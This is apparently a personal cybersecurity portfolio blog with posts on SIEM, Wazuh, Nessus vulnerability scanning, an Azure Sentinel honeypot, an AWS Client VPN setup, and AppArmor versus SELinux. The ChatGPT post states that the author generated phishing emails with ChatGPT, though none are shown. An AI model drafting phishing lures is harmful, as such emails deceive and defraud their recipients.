AWS partyrock

PartyRock.aws: Building Your AI Dreams without Code Hassles

PartyRock.aws is an engaging Amazon Bedrock Playground, serving as an enjoyable and user-friendly generative AI application development tool. This web-based interface empowers users to craft AI-driven apps effortlessly, eliminating the necessity for coding. Grounded in the principle that every creator deserves access to an enjoyable and intuitive tool for app creation, PartyRock provides a gateway to foundation models (FMs) from Amazon Bedrock. This allows users to playfully experiment with prompt engineering, fostering a hands-on learning experience. Additionally, PartyRock extends a no-cost trial for new users, requiring no credit card information. Tailored to facilitate learning of generative AI techniques and capabilities, PartyRock encourages users to explore diverse foundation models, refine their text-based prompting skills, and seamlessly chain prompts together.

Explore the capabilities of PartyRock.aws through the following link, where you’ll find the resume checker app I built:
https://partyrock.aws/u/ezrahall/9a4Zgar86/Resume-Checker

 

Wazuh

Wazuh: Your Gateway to Understanding SIEM

In the ever-evolving landscape of cybersecurity, the need for robust solutions to monitor, detect, and respond to security threats is paramount. Security Information and Event Management (SIEM) tools play a pivotal role in achieving this, and one such tool that has been gaining traction is Wazuh. Whether you’re a cybersecurity enthusiast or a professional just starting to explore the intricacies of SIEM, Wazuh could be your guiding light in understanding and fortifying digital defenses.

What is Wazuh?

At its core, Wazuh is an open-source security information and event management (SIEM) solution. But what sets it apart is its holistic approach to security, combining intrusion detection, vulnerability detection, log analysis, and more into a single, comprehensive platform. Developed on the Elastic Stack (formerly ELK Stack), Wazuh offers a scalable and flexible solution for organizations of all sizes.

Features that Define Wazuh:

  1. Intrusion Detection: Wazuh excels at identifying suspicious activities and potential security breaches by analyzing network traffic, system logs, and application logs.
  2. Log Analysis: The tool aggregates and analyzes logs from various sources, providing valuable insights into the overall security posture of your environment.
  3. Vulnerability Detection: Wazuh actively scans systems for vulnerabilities, ensuring that potential weaknesses are identified and addressed promptly.
  4. Real-time Alerting: Wazuh keeps you in the loop with real-time alerts, allowing you to respond swiftly to emerging threats.
  5. Compliance Management: For organizations dealing with regulatory compliance requirements, Wazuh simplifies the process by offering predefined rule sets and reporting capabilities.

Navigating the SIEM Landscape with Wazuh

User-Friendly Setup:

One of the most significant hurdles for those new to SIEM is the complexity of implementation. Wazuh, however, provides a user-friendly setup that eases the onboarding process. The intuitive web-based interface guides users through installation, configuration, and management, making it accessible even for beginners.

Learning Through Practical Application:

Understanding SIEM is not merely theoretical; hands-on experience is crucial. Wazuh provides an ideal platform for learning by offering practical insights into real-world security scenarios. The tool’s versatility allows users to experiment with different configurations and scenarios, gaining a deeper understanding of how SIEM works in action.

Community Support and Documentation:

Embarking on a journey to comprehend SIEM can be daunting, but with Wazuh’s active community and comprehensive documentation, the learning curve becomes more manageable. The community is a valuable resource for troubleshooting, sharing best practices, and staying updated on the latest developments.

business-report-graphs-charts-business-concept (1)

The Critical Role of GRC in the Cybersecurity Industry

Governance, Risk, and Compliance (GRC) forms the bedrock of a robust cybersecurity framework. The growing importance of GRC in the cybersecurity industry cannot be overstated, and here’s why.

Firstly, GRC provides a structured approach towards managing an organization’s overall governance, risk management, and compliance with regulations. As cyber threats evolve, so too must the strategies to combat them. GRC allows for the establishment of clear cybersecurity policies, ensuring everyone within an organization understands their role in maintaining a secure environment.

Secondly, risk management, a core component of GRC, is crucial in cybersecurity. It involves identifying potential threats, assessing their impact, and implementing measures to mitigate them. By incorporating risk management into their cybersecurity strategies, organizations can prepare for and lessen the effects of a potential cyber attack.

Furthermore, regulatory compliance is an essential aspect of GRC. Non-compliance with data protection and privacy laws can result in heavy fines and reputation damage. GRC ensures organizations adhere to these regulations, minimizing the risk of legal and financial repercussions.

Moreover, GRC encourages a culture of security within an organization. By integrating GRC into daily operations, employees become more aware of their responsibilities in maintaining cybersecurity, creating a proactive rather than reactive approach to threats.

Lastly, with the ever-increasing interconnectivity of systems and reliance on digital infrastructure, the magnitude of potential cyber threats is expanding. GRC provides a cohesive strategy to manage these threats effectively, ensuring the continuous operation and security of an organization’s digital assets.

SIEM

What is SIEM?

Security Information and Event Management (SIEM) is a system that helps organizations to detect and respond to cybersecurity threats. It works by collecting security data from various sources such as network devices, servers, applications, and other security devices, and analyzing that data for any suspicious activity. The goal is to identify potential security incidents, investigate them, and respond to them quickly before they cause harm to the organization. SIEM solutions also offer capabilities such as threat intelligence, user and entity behavior analytics (UEBA), and compliance reporting.

There are many SIEM solutions available in the market that offer different features and functionalities. Here is a list of the best SIEM solutions:

LogRhythm
IBM QRadar SIEM
Microsoft Azure Sentinel
Securonix
LogPoint
Elastic Stack
Splunk
RSA NetWitness Platform
AT&T Cybersecurity
Sumo Logic
Exabeam

It is essential to evaluate different SIEM solutions based on the organization’s specific needs, budget, and goals. Evaluating SIEM solutions helps organizations select the most effective solution that can reduce risk, enable compliance, and enhance security posture. Moreover, organizations should regularly review their SIEM solutions to ensure that they are up to date with current security trends and evolving threat landscapes. This way, they can continue to enhance their security posture and stay ahead of potential security threats.

Cyber attacks demonstration using Azure Sentinel SIEM
The project below demonstrates how I set up a cloud based SIEM, as well as virtual machine in the cloud which was used as a honeypot. It had vulnerabilities to the internet which I monitored and logged the attacks from different ip addresses, from different countries all over the world. I extracted the failed log on data and ingested it into Azure Sentinel and presented it on a world map so you can visualize where the attacks were coming from.

Industrial cybersecurity concept vector illustration.

Vulnerability management and some of the best tools to use

In today’s increasingly interconnected digital landscape, vulnerability management has become an essential aspect of securing an organization’s network and infrastructure. Vulnerability management refers to the process of identifying, assessing, prioritizing, and mitigating vulnerabilities within an organization’s IT environment. By implementing a robust vulnerability management program, organizations can significantly reduce their risk of falling victim to cyber attacks.

One crucial component of vulnerability management is vulnerability scanning. This involves using specialized software to scan an organization’s systems and networks for known vulnerabilities. Vulnerability scanning tools automate the process of identifying vulnerabilities, making it easier for security teams to detect and remediate them before attackers can exploit them.

Here are some of the best vulnerability scanning tools available:

  1. Nessus: A widely used vulnerability scanner that is particularly well-suited to large-scale environment
  2. OpenVAS: An open-source vulnerability scanner that offers a powerful set of features and is ideal for small to medium-sized organizations.
  3. Qualys: A cloud-based vulnerability management tool that offers a broad range of capabilities, including vulnerability scanning, asset management, and compliance reporting.
  4. Rapid7: Offers vulnerability scanning and management as part of its comprehensive security suite, which also includes threat intelligence, incident detection and response, and more.
  5. Nmap: While not strictly a vulnerability scanner, Nmap is a powerful network exploration tool that can be used to identify open ports and potential vulnerabilities.
  6. Retina: Offers vulnerability scanning and patch management capabilities, making it an ideal choice for organizations that need an all-in-one solution.

When it comes to vulnerability management, it’s essential to have the right tools at your disposal. By using a combination of vulnerability scanning tools and other security technologies, organizations can effectively manage their risk and protect their assets from cyber threats.

Vulnerability management demonstration using Nessus Essentials
The project below demonstrates how I conducted credential scan to find vulnerabilities and doing remediation to resolve the vulnerabilities.
From completing this project, I understood that vulnerability management consists of continuously assessing assets in discovering vulnerabilities remediating them to an acceptable risk and then starting the process over again making sure the risk is low or at least acceptable level.

 

Qualys-Logo.wine

Qualys free training and certification.

Qualys, a leading provider of cloud-based security and compliance solutions, offers a wide range of free training and certification programs to help users gain the knowledge and skills they need to effectively use the Qualys platform. The training programs are available on the Qualys website and cover topics such as vulnerability management, compliance, and threat protection.

The training programs are designed for both beginners and advanced users and offer a mix of self-paced online courses and instructor-led training sessions. Users can choose from a variety of courses, including Vulnerability Management, Policy Compliance, Web Application Scanning, and Asset Management. Each course is designed to provide a comprehensive understanding of the Qualys platform and its features, as well as practical experience in using the platform to identify vulnerabilities, monitor compliance, and protect against threats.

In addition to the free training programs, Qualys also offers certification programs that enable users to demonstrate their expertise in using the Qualys platform. The certifications are available at various levels, including Certified Vulnerability Management Specialist, Certified Policy Compliance Specialist, and Certified Web Application Scanning Specialist. To earn a certification, users must pass an online exam that tests their knowledge of the Qualys platform and its features.

docker

Docker Fundamentals Course.

I recently completed Adrian Cantrill’s Docker Fundamentals course. It is a comprehensive and in-depth guide to learning Docker, a powerful containerization platform that has revolutionized the way developers build, deploy, and manage applications. The course is designed for both beginners and advanced users and covers everything from the basics of Docker to advanced topics such as networking, security, and orchestration.

One of the key features of this course is its practical approach. Adrian provides step-by-step instructions and real-world examples to help students understand and apply Docker concepts in a meaningful way. Students learn how to install and configure Docker on their local machines, create and manage Docker containers, and work with Docker images. They also learn how to use Docker to deploy and scale applications, and how to troubleshoot common issues that can arise.

Another standout feature of this course is its focus on best practices. Adrian emphasizes the importance of writing clean, efficient Dockerfiles and using appropriate tools and techniques to optimize container performance. He also covers key security considerations, such as configuring Docker to run with minimal privileges and implementing network segmentation to isolate containers.

One of the most compelling aspects of this course is Adrian’s teaching style. He is an engaging and dynamic instructor who is clearly passionate about Docker and containerization. His explanations are clear and concise, and he uses a variety of teaching tools, including diagrams, code snippets, and live demos, to help students understand complex topics.

Computer network

Why it is important to learn computer networking fundamentals for any IT profession.

Computer networking is the backbone of modern IT infrastructure, and it plays a critical role in supporting communication and data transfer between different devices, systems, and networks. Therefore, understanding the fundamentals of computer networking is essential for any IT professional, regardless of their specialization. Here are a few reasons why:

  1. Communication: Networking is the foundation of communication in modern organizations, and it enables IT professionals to establish and maintain connections between different systems, devices, and users. Understanding how networking protocols, devices, and services work together to facilitate communication is critical for IT professionals to troubleshoot issues and maintain the network’s integrity.
  2. Security: With the increasing prevalence of cyber threats and attacks, it’s critical for IT professionals to understand network security fundamentals. This includes knowledge of various security protocols, authentication methods, and encryption techniques to ensure that the network remains secure from unauthorized access and data breaches.
  3. Troubleshooting: Network issues are a common occurrence, and troubleshooting them requires a deep understanding of networking concepts and protocols. IT professionals need to have the skills to diagnose and resolve network issues quickly to minimize downtime and maintain productivity.
  4. Scalability: As businesses grow, their network infrastructure needs to scale accordingly. Understanding the fundamentals of network architecture, design, and deployment is crucial for IT professionals to ensure that the network can handle increasing traffic and user demands.
Cybersecurity training

Why cybersecurity training is important for career development?

Cybersecurity training is important for career development in today’s digital age because it equips individuals with the skills and knowledge necessary to protect organizations from cyber attacks. With technology becoming more integrated into every aspect of our lives, the risk of cyberattacks is increasing, and this has created a high demand for cybersecurity professionals who can keep networks, systems, and data safe.

One way to gain the skills and knowledge needed for a career in cybersecurity is through training programs. There are many platforms available for cybersecurity training, such as Haiku Pro, TryHackMe and HackTheBox, which offer a variety of resources for individuals to learn and practice cybersecurity skills. For example, Haiku Pro provides interactive and engaging learning experience, TryHackMe.com offers simulated real-world scenarios, and HackTheBox.com offers a platform for individuals to test their hacking skills in a legal and safe environment.

Cybersecurity training is not just for individuals who are looking to enter the field, but also for professionals who are already working in the industry. Cyber threats are constantly evolving, and cybersecurity professionals need to keep up with the latest tools and techniques to effectively protect their organizations from attacks. Cybersecurity training helps professionals acquire new skills and stay current on industry developments.

In addition to the technical aspects, cybersecurity training also covers the legal and compliance aspects of the industry. As data protection laws and regulations become more stringent, organizations need to ensure compliance, and cybersecurity professionals need to be familiar with these laws and regulations. Cybersecurity training helps professionals understand the legal and ethical context of their work.

Resources:
https://www.hackthebox.com
https://tryhackme.com
https://haikupro.com

OpenAI

What is ChatGPT?

ChatGPT is a language model that has been trained to generate text based on the input it receives. It is a variant of the GPT-3 model, which is a state-of-the-art language processing system developed by OpenAI. ChatGPT is designed to be able to generate text that is similar to human conversation, allowing it to be used for tasks such as generating responses in a chatbot or generating dialogue in a natural language generation application. Because ChatGPT is a machine learning model, it can continue to improve and become more accurate over time as it is exposed to more data.

Below is a few phishing emails I created using ChatGPT.

 

 

 

 

Continue Reading

API image

What is an API?

In this blog post I will be describing what is API, discuss the Twitter API vulnerability data breach which happened on December 2021 and my REST API project.

What is an API?

An application program interface (API) is code that allows two software programs to communicate with each other. An API defines the correct way for a developer to request services from an operating system (OS) or other application, and expose data within different contexts and across multiple channels.

Any data can be shared with an application program interface. APIs are implemented by function calls composed of verbs and nouns; the required syntax is described in the documentation of the application being called.

How does APIs work?
The application sending the request is called the client, and the application sending the response is called the server.

APIs are made up of two related elements. The first is a specification that describes how information is exchanged between programs, done in the form of a request for processing and a return of the necessary data. The second is a software interface written to that specification and published.

The software that wants to access the features and capabilities of the API is said to “call” it, and the software that creates the API is said to “publish” it.

APIs authorize and grant access to data that is requested by users and other applications. Access is authenticated to a service or portion of functionality, against predefined roles that govern who or what service can access specific actions or data.

Types of APIs:
– SOAP APIs (Simple Object Protocol uses XML)
– RPC APIs (Remote Procedure Calls)
– Websocket APIs (used JSON)
– REST APIs (uses HTTP, most popular and flexible)

Twitter API vulnerability data breach

It was reported that 5.4 million Twitter users’ stolen data leaked online and more shared privately. This is a good example showing that not properly securing your API can leak information and how threat actors can use it.
Source: https://www.bleepingcomputer.com/news/security/54-million-twitter-users-stolen-data-leaked-online-more-shared-privately/

REST API project

In this REST API project I demonstrated how to retrieve patients medical records, update patients personal information such as: address, phone number etc, add a new patient to the system and delete existing patient medical records from the database. I used Postman to send my API requests and to test the code.

AWS Client VPN

Implementing AWS Client VPN

In this blog post I will showcase how to implement AWS Client VPN.

AWS Client VPN is a fully-managed remote access VPN solution used by your remote workforce to securely access resources within both AWS and your on-premises network. Fully elastic, it automatically scales up, or down, based on demand. When migrating applications to AWS, your users access them the same way before, during, and after the move. AWS Client VPN, including the software client, supports the OpenVPN protocol.

Step 1 – Create Simple AD instance

This section I created Simple AD setup.

centered image
 

centered image
 

centered image
-I selected small (for larger deployments, selecting large might be a better option)
-Directory DNS Name, I used: corp.awssimplified.org
-Directory NetBIOS name, I used: CORP
-I made sure I created a complex password.
-I selected 2 private subnets pre-configured.

centered image
The directory will start provisioning, it will need to completed and moved into the active state before continuing to stage 2.

Step 2 – Create RSA server certificate

I will explain how to create the certificate.
As I am using Windows operating system these are the steps I followed.
I opened the OpenVPN Community Downloads page and download the Windows installer for my  version of Windows, and run the installer (https://openvpn.net/community-downloads).

I opened the EasyRSA releases page and download the ZIP file for my version of Windows. Extract the zip file and copy the EasyRSA folder to the \Program Files\OpenVPN folder (https://github.com/OpenVPN/easy-rsa/releases).

I opened the command prompt as an administrator, navigated to the \Program Files\OpenVPN\EasyRSA directory, and run the following command to open the EasyRSA shell.

EasyRSA-Start
./easyrsa init-pki
./easyrsa build-ca nopass
./easyrsa build-server-full server nopass
./easyrsa build-client-full client1.domain.tld nopass
exit

This is where I built the certificate.

centered image
 

Step 3 – Create VPN Endpoint

In this section I created the VPN endpoint.
Type VPC in the services search box at the top of the screen, right click and open in a new tab.
Under Virtual Private Network (VPN) on the menu on the left, locate and click create VPN endpoint.

centered image
For Name Tag enter: A4L Client VPN.
Client IPv4 CIDR enter: 192.168.12.0/22.
For the server certificate ARN, I selected the server certificate I created in step 2.
Under authentication options, I ticked use user-based authentication.
I also ticked check active directory authentication.
For DNS Server 1 IP address and DNS Server 2 IP address I entered the IP addresses of the directory service instance.

centered image
 

centered image
centered image
centered image
At this stage, the VPN endpoint is ready for configuration in the next stage.

 

Step 4 – Configure VPN Endpoint & Associations

I clicked the associations tab and clicked associate.
Clicked the VPC dropdown and selected A4L-VPC.
I located the subnet ID for the 3 private subnets in the A4L VPC.
Click associate, then I click close the VPN endpoint.
From there I had to pause and wait for the state of the VPN endpoint to change from pending-associate to available.

centered image
 

Step 5 – Download, Install & Test

I clicked download client configuration.

centered image
I went to aws.amazon.com/vpn/client-vpn-download and downloaded the client for my operating system.

 

centered image
I installed the VPN application, started the application, went to manage profiles, and added my profile which I downloaded.

centered image
centered image
centered image
I needed to ensure I authorize the connection, or the VPN would not work.
From the client VPN console click the authorization rules tab and click add authorize rule.
For destination network to enable enter 10.16.0.0/16.
For grant access to, I ticked allow access to all users.
Click add authorization Rule.

centered image
 

 

Resource: https://github.com/acantril/learn-cantrill-io-labs/tree/master/aws-client-vpn

Technical Account Manager

The benefits of having a Technical Account Manager

In this blog post I will explain what a Technical Account Manager responsibilities are and the benefits of having a Technical Account Manager in your organisation.

Technical Account Managers are responsible for managing all the technical aspects of a company’s relationship with its clients. Whilst providing top-quality technical service, TAM assist in strengthening customer relationships and ensuring customer satisfaction. Sometimes, TAM may work with the product development teams in order to customise products for large sales or for individual customers. TAM  might also demonstrate products to customers and explain how such product meets customers’ needs.
Whenever customers agree to purchase a product, TAM  would identify and provide the support and services such customers will need so as to make productive and effective use of the products.
TAM are responsible for managing ongoing support to customers in order to confirm that the customers continue to make effective use of the company’s products. TAM monitor support requests made by customers to identify any recurring issues and recommend changes to products.
Technical account managers hold regular review meetings with customers for discussions on any problems and issues and report to other members of the account team. They analyse customers’ support needs and identify areas where the company can reduce support costs and offer improved service.

Benefits of having a Technical Account Manager

-Better strategic and technical alignment between TAM and customer:
-Providing insight into company’s product roadmap.
-Identifying technical and business best practices tailored to customer organisation.
-Higher return on investment by helping customer fully leverage all features included in their subscription:
-Customers advocate who:
-Escalates tickets and issues as necessary.
-Coordinates within departments to increase visibility and prioritise customers needs:
-Assists with crisis and incident management.

 

 

Data_security_28

AppArmor vs SELinux

SELinux

SELinux (Security-Enhanced Linux), is a part of the Linux security kernel that acts as a protective agent on servers. In the Linux kernel, SELinux relies on mandatory access controls (MAC) that restrict users to rules and policies set by the system administrator. MAC is a higher level of access control than the standard discretionary access control (DAC),and prevents security breaches in the system by only processing necessary files that the administrator pre-approves.

SELinux was initially released as a collaborative between Red Hat and the National Security Agency. SELinux receives periodic updates and additions as new Linux distributions are released. The SELinux kernel separates policy and decisions inside the kernel to distribute levels of protection and prevent a total security breach.

SELinux acts under the least-privilege model. SELinux only grants access if the administrator writes a specific policy to do so.

SELinux modes

There are three modes of SELinux: Enforcing, Permissive and Disabled.

Enforcing mode – is the default mode at installation of SELinux. It will enforce the policies on the system, deny access and log actions.

Permissive mode – is the most commonly used mode for troubleshooting SELinux. In this mode, SELinux enables but does not enforce security policies. Also, this means that actions will result in a warning and log for the system administrator.

Disabled mode – means that SELinux is turned off and the security policies do not protect the server.

AppArmor

AppArmor (Application Armor) is a Linux kernel security module that allows the system administrator to restrict programs’ capabilities with per-program profiles. Profiles can allow capabilities like network access, raw socket access, and the permission to read, write, or execute files on matching paths. AppArmor supplements the traditional Unix discretionary access control (DAC) model by providing mandatory access control (MAC). It has been partially included in the mainline Linux kernel since version 2.6.36 and its development has been supported by Canonical since 2009.

AppArmor and SELinux comparison

There are several key differences:

-One important difference is that AppArmor identifies file system objects by path name instead of inode. This means that, for example, a file that is inaccessible may become accessible under AppArmor when a hard link is created to it, while SELinux would deny access through the newly created hard link.

-SELinux and AppArmor also differ significantly in how they are administered and how they integrate into the system.

-Since it endeavors to recreate traditional DAC controls with MAC-level enforcement, AppArmor’s set of operations is also considerably smaller than those available under most SELinux implementations. For example, AppArmor’s set of operations consist of: read, write, append, execute, lock, and link. Most SELinux implementations will support numbers of operations orders of magnitude more than that. For example, SELinux will usually support those same permissions, but also includes controls for mknod, binding to network sockets, implicit use of POSIX capabilities, loading and unloading kernel modules, various means of accessing shared memory, etc.

-There are no controls in AppArmor for categorically bounding POSIX capabilities. Since the current implementation of capabilities contains no notion of a subject for the operation (only the actor and the operation) it is usually the job of the MAC layer to prevent privileged operations on files outside the actor’s enforced realm of control (i.e. “Sandbox”). AppArmor can prevent its own policy from being altered, and prevent file systems from being mounted/unmounted, but does nothing to prevent users from stepping outside their approved realms of control.

-AppArmor configuration is done using solely regular flat files. SELinux (by default in most implementations) uses a combination of flat files (used by administrators and developers to write human readable policy before it’s compiled) and extended attributes.

-SELinux supports the concept of a “remote policy server” (configurable via /etc/selinux/semanage.conf) as an alternative source for policy configuration. Central management of AppArmor is usually complicated considerably since administrators must decide between configuration deployment tools being run as root (to allow policy updates) or configured manually on each server.

 

 

Big data processing concept, server room, blockchain technology token access, data center and database, network connection isometric illustration vector neon dark

Virtualization vs Containerization

Virtualization

Virtualization helps us to create software-based or virtual versions of a computer resource. These computer resources can include computing devices, storage, networks, servers, or even applications. It allows organizations to partition a single physical computer or server into several virtual machines (VM). Each VM can then interact independently and run different operating systems or applications while sharing the resources of a single computer.

How Does Virtualization Work?

Hypervisor software facilitates virtualization. A hypervisor sits on top of an operating system. But, we can also have hypervisors that are installed directly onto the hardware. Hypervisors take physical resources and divide them up so that virtual environments can use them.
When a user or program issues an instruction to the VM that requires additional resources from the physical environment, the hypervisor relays the request to the physical system and caches the changes. There are two types of hypervisors, Type 1 (Bare Metal) and Type 2 (Hosted).

centered image
 

The main feature of virtualization is that it lets you run different operating systems on the same hardware. Each virtual machine’s operating system (guest OS) does all the necessary start-up activities such as bootstrapping, loading the kernel, and so on. However, each guest OS is controlled through elevated security measures so that they don’t acquire full access to the underlying OS.

 

Containerization

Containerization is a lightweight alternative to virtualization. This involves encapsulating an application in a container with its own operating environment. Thus, instead of installing an OS for each virtual machine, containers use the host OS.

How Does Containerization Work?
Each container is an executable package of software that runs on top of a host OS. A host can support many containers concurrently. For example, in a microservice architecture environment, this set up works as all containers run on the minimal, resource-isolated process that others can’t access.

centered image
 

1)At the bottom of the layer, there are physical infrastructures such as CPU, disk storage, and network interfaces
2)Above that, there is the host OS and its kernel. The kernel acts the bridge between the software of the OS and the hardware resources
3)The container engine and its minimal guest OS sits on top of the host OS
4)At the very top, there are binaries, libraries for each application and the apps that run on their isolated user spaces

Containerization evolved from a Linux feature known as cgroups. It’s a feature for isolating and controlling resource usage for an operating system process.
For example, it defines the amount of CPU and RAM or the number of threads that a process can entitle to access within the Linux kernel. cgroups later became Linux Containers (LXC) with more advanced features for namespace isolation of components, such as routing tables and file systems.

Comparison table

Area Virtualization Containerization
Isolation Provides complete isolation from the host operating system and the other VMs. Typically provides lightweight isolation from the host and other containers, but doesn’t provide as strong a security boundary as a VM.
Operating System Runs a complete operating system including the kernel, thus requiring more system resources such as CPU, memory, and storage. Runs the user-mode portion of an operating system, and can be tailored to contain just the needed services for your app using fewer system resources.
Guest compatibility Runs just about any operating system inside the virtual machine. Runs on the same operating system version as the host.
Deployment Deploy individual VMs by using Hypervisor software. Deploy individual containers by using Docker or deploy multiple containers by using an orchestrator such as Kubernetes.
Persistent storage Use a Virtual Hard Disk (VHD) for local storage for a single VM or a Server Message Block (SMB) file share for storage shared by multiple servers. Use local disks for local storage for a single node or SMB for storage shared by multiple nodes or servers.
Load balancing Virtual machine load balancing is done by running VMs in other servers in a failover cluster. An orchestrator can automatically start or stop containers on cluster nodes to manage changes in load and availability.
Networking Uses virtual network adapters. Uses an isolated view of a virtual network adapter. Thus, provides a little less virtualization.

 

 

Security Standards

Security Standards, Frameworks and Benchmarks

STIGs Benchmarks – Security Technical Implementation Guides

CIS Benchmarks – CIS Center for Internet Security

NIST – Current FIPS

ISO Standards Catalogue

Common Criteria for Information Technology Security Evaluation (CC) is an international standard (ISO / IEC 15408) for computer security. It allows an objective evaluation to validate that a particular product satisfies a defined set of security requirements.

ISO 22301 is the international standard that provides a best-practice framework for implementing an optimised BCMS (business continuity management system).

ISO27001 is the international standard that describes the requirements for an ISMS (information security management system). The framework is designed to help organizations manage their security practices in one place, consistently and cost-effectively.

ISO 27701 specifies the requirements for a PIMS (privacy information management system) based on the requirements of ISO 27001. It is extended by a set of privacy-specific requirements, control objectives and controls. Companies that have implemented ISO 27001 will be able to use ISO 27701 to extend their security efforts to cover privacy management.

EU GDPR (General Data Protection Regulation) is a privacy and data protection law that supersedes existing national data protection laws across the EU, bringing uniformity by introducing just one main data protection law for companies/organizations to comply with.

CCPA (California Consumer Privacy Act) is a data privacy law that took effect on January 1, 2020 in the State of California. It applies to businesses that collect California residents’ personal information, and its privacy requirements are similar to those of the EU’s GDPR (General Data Protection Regulation).

Payment Card Industry (PCI) Data Security Standards (DSS) is a global information security standard designed to prevent fraud through increased control of credit card data.

SOC 2 is an auditing procedure that ensures your service providers securely manage your data to protect the interests of your comapny/organization and the privacy of their clients.

NIST CSF is a voluntary framework primarily intended for critical infrastructure organizations to manage and mitigate cybersecurity risk based on existing best practice.

Landlock LSM(Linux Security Module) is a framework to create scoped access-control (sandboxing). Landlock is designed to be usable by unprivileged processes while following the system security policy enforced by other access control mechanisms (DAC, LSM, etc.).

Secure boot is a security standard developed by members of the PC industry to help make sure that a device boots(Unified Extensible Firmware Interface (UEFI) BIOS) using only software(such as bootloaders, OS, UEFI drivers, and utilities) that is trusted by the Original Equipment Manufacturer (OEM).

Computer security system icons background vector

What is vulnerability management?

Vulnerability management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. This, implemented alongside with other security tactics, is vital for organizations to prioritize possible threats and minimizing their attack surface.

Vulnerability management software can help automate this process. They’ll use a vulnerability scanner and sometimes endpoint agents to inventory a variety of systems on a network and find vulnerabilities on them. Once vulnerabilities are identified, the risk they pose needs to be evaluated in different contexts so decisions can be made about how to best treat them. For example, vulnerability validation can be an effective way to contextualize the real severity of a vulnerability.

The vulnerability management process can be broken down into the following four steps:

1) Identifying Vulnerabilities
2) Evaluating Vulnerabilities
3) Treating Vulnerabilities
4) Reporting Vulnerabilities

Step 1: Identifying Vulnerabilities

At the heart of a typical vulnerability management solution is a vulnerability scanner. The scan consists of four stages:
1) Scan network-accessible systems by pinging them or sending them TCP/UDP packets.
2) Identify open ports and services running on scanned systems.
3) If possible, remotely log in to systems to gather detailed system information.
4) Correlate system information with known vulnerabilities.

Vulnerability scanners are able to identify a variety of systems running on a network, such as laptops and desktops, virtual and physical servers, databases, firewalls, switches, printers, etc. Identified systems are probed for different attributes: operating system, open ports, installed software, user accounts, file system structure, system configurations, and more. This information is then used to associate known vulnerabilities to scanned systems. In order to perform this association, vulnerability scanners will use a vulnerability database that contains a list of publicly known vulnerabilities.

Properly configuring vulnerability scans is an essential component of a vulnerability management solution. Vulnerability scanners can sometimes disrupt the networks and systems that they scan. If available network bandwidth becomes very limited during an organization’s peak hours, then vulnerability scans should be scheduled to run during off hours.

If some systems on a network become unstable or behave erratically when scanned, they might need to be excluded from vulnerability scans, or the scans may need to be fine-tuned to be less disruptive. Adaptive scanning is a new approach to further automating and streamlining vulnerability scans based on changes in a network. For example, when a new system connects to a network for the first time, a vulnerability scanner will scan just that system as soon as possible instead of waiting for a weekly or monthly scan to start scanning that entire network.

Vulnerability scanners aren’t the only way to gather system vulnerability data anymore, though. Endpoint agents allow vulnerability management solutions to continuously gather vulnerability data from systems without performing network scans. This helps organizations maintain up-to-date system vulnerability data whether or not, for example, employees’ laptops are connected to the organization’s network or an employee’s home network. Regardless of how a vulnerability management solution gathers this data, it can be used to create reports, metrics, and dashboards for a variety of audiences.

Step 2: Evaluating Vulnerabilities

After vulnerabilities are identified, they need to be evaluated so the risks posed by them are dealt with appropriately and in accordance with an organization’s risk management strategy. Vulnerability management solutions will provide different risk ratings and scores for vulnerabilities, such as Common Vulnerability Scoring System (CVSS) scores. These scores are helpful in telling organizations which vulnerabilities they should focus on first, but the true risk posed by any given vulnerability depends on some other factors beyond these out-of-the-box risk ratings and scores.

Here are some examples of additional factors to consider when evaluating vulnerabilities:

– Is this vulnerability a true or false positive?
– Could someone directly exploit this vulnerability from the Internet?
– How difficult is it to exploit this vulnerability?
– Is there known, published exploit code for this vulnerability?
– What would be the impact to the business if this vulnerability were exploited?
– Are there any other security controls in place that reduce the likelihood and/or impact of this vulnerability being exploited?
– How old is the vulnerability/how long has it been on the network?

Like any security tool, vulnerability scanners aren’t perfect. Their vulnerability detection false-positive rates, while low, are still greater than zero. Performing vulnerability validation with penetration testing tools and techniques helps weed out false-positives so organizations can focus their attention on dealing with real vulnerabilities. The results of vulnerability validation exercises or full-blown penetration tests can often be an eye-opening experience for organizations that thought they were secure enough or that the vulnerability wasn’t that risky.

Step 3: Treating Vulnerabilities

Once a vulnerability has been validated and deemed a risk, the next step is prioritizing how to treat that vulnerability with original stakeholders to the business or network. There are different ways to treat vulnerabilities, including:

Remediation: Fully fixing or patching a vulnerability so it can’t be exploited. This is the ideal treatment option that organizations strive for.
Mitigation: Lessening the likelihood and/or impact of a vulnerability being exploited. This is sometimes necessary when a proper fix or patch isn’t yet available for an identified vulnerability. This option should ideally be used to buy time for an organization to eventually remediate a vulnerability.
Acceptance: Taking no action to fix or otherwise lessen the likelihood/impact of a vulnerability being exploited. This is typically justified when a vulnerability is deemed a low risk, and the cost of fixing the vulnerability is substantially greater than the cost incurred by an organization if the vulnerability were to be exploited.

Vulnerability management solutions provide recommended remediation techniques for vulnerabilities. Occasionally a remediation recommendation isn’t the optimal way to remediate a vulnerability; in those cases, the right remediation approach needs to be determined by an organization’s security team, system owners, and system administrators. Remediation can be as simple as applying a readily-available software patch or as complex as replacing a fleet of physical servers across an organization’s network.

When remediation activities are completed, it’s best to run another vulnerability scan to confirm that the vulnerability has been fully resolved.

However, not all vulnerabilities need to be fixed. For example, if an organization’s vulnerability scanner has identified vulnerabilities in Adobe Flash Player on their computers, but they completely disabled Adobe Flash Player from being used in web browsers and other client applications, then those vulnerabilities could be considered sufficiently mitigated by a compensating control.

Step 4: Reporting vulnerabilities

Performing regular and continuous vulnerability assessments enables organizations to understand the speed and efficiency of their vulnerability management program over time. Vulnerability management solutions typically have different options for exporting and visualizing vulnerability scan data with a variety of customizable reports and dashboards. Not only does this help IT teams easily understand which remediation techniques will help them fix the most vulnerabilities with the least amount of effort, or help security teams monitor vulnerability trends over time in different parts of their network, but it also helps support organizations’ compliance and regulatory requirements.

Staying Ahead of Attackers through Vulnerability Management

Threats and attackers are constantly changing, just as organizations are constantly adding new mobile devices, cloud services, networks, and applications to their environments. With every change comes the risk that a new hole has been opened in your network, allowing attackers to slip in and walk out with your crown jewels.

Every time you get a new affiliate partner, employee, client or customer, you open up your organization to new opportunities, but you’re also exposing it to new threats. Protecting your organization from these threats requires a vulnerability management solution that can keep up with and adapt to all of these changes. Without that, attackers will always be one step ahead.

How are vulnerabilities defined?

While security vendors can choose to build their own vulnerability definitions, vulnerability management is commonly seen as being an open, standards-based effort using the security content automation protocol (SCAP) standard developed by the National Institute of Standards and Technology (NIST). At a high level, SCAP can be broken down into a few components:

